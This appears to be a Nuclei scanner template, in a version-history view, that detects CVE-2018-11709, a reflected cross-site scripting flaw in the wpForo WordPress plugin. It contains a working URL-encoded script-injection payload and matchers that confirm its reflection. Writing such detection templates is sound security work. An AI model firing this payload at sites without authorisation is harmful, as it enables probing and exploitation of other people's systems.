my-nuclei-templates/CVE-2018-11709.yaml

41 lines
1.1 KiB
YAML
Raw Permalink Normal View History

2021-07-16 08:42:34 +00:00
id: CVE-2018-11709
info:
2022-06-18 08:05:25 +00:00
name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
2021-07-16 08:42:34 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11709
- https://wordpress.org/plugins/wpforo/#developers
- https://wpvulndb.com/vulnerabilities/9090
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2018-11709
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2018,wordpress,xss,wp-plugin
2021-07-16 08:42:34 +00:00
requests:
- method: GET
path:
2021-07-20 23:36:53 +00:00
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-16 08:42:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-20 23:36:53 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 08:42:34 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/03/31